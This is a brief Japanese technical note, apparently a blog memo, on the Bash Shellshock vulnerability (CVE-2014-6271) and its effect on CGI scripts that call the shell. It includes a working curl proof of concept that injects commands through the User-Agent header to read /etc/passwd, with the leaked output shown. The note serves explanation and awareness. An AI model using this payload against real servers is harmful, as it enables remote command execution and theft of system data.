https://support.clara.jp/news/20140925_bash_update.htm
http://www.walbrix.com/jp/blog/2014-09-bash-code-injection.html
https://access.redhat.com/security/cve/CVE-2014-6271
※CGI本体をシェルスクリプトで書いていなくても、シェルを使って外部コマンドを呼び出しているだけで影響有り
下記のスクリプトをCGIモードで動かしている場合、影響有りです。
<?php echo 'AAAA'; exec('df -h',$array); foreach($array as $v){ echo $v."\n"; } ?>
curl -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://fl8.jp/test.php AAAAContent-type:text/plain root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin ・ ・ ・ ・